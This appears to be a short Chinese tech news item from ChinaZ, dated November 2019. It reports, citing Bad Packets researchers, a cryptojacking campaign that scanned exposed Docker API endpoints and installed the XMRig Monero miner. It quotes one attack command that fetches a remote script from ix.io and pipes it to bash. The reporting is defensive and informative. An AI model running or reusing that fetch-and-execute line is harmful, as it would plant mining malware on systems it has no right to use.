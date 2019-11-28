站长之家(ChinaZ.com) 11月28日 消息:据tnw报道，一黑客组织正对企业沙箱软件Docker进行大规模扫描，以搜索系统上易受攻击的端口，以挖掘加密货币。



根据Bad Packets的安全研究人员的说法，从上周末开始的扫描发现了一些漏洞，这些漏洞允许攻击者在公司的Docker实例植入加密货币挖矿恶意代码。

就目前情况来看，攻击者在加密劫持活动已经扫描了超过 59000 个IP网络，寻找易受攻击的Docker实例。研究人员在一个暴露的Docker实例中发现运行下面一行代码：

chroot/mnt/bin/sh-c ' curl-SL4 http：//ix.io/1XQa | bash

该恶意代码将从攻击者的服务器下载另一个脚本，然后安装一个加密挖矿工具，Monero miner XMRig。

Bad Packets首席研究官兼联合创始人Troy Mursch称，在这几天针对Docker的攻击活动中，黑客挖掘了14.82 XMR，价值约 740 美元。Mursch建议运行Docker平台的用户立即检查他们是否在互联网上公开了其API端点。

注：Docker 是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中，然后发布到任何流行的 Linux或Windows 机器上，也可以实现虚拟化。容器是完全使用沙箱机制，相互之间不会有任何接口。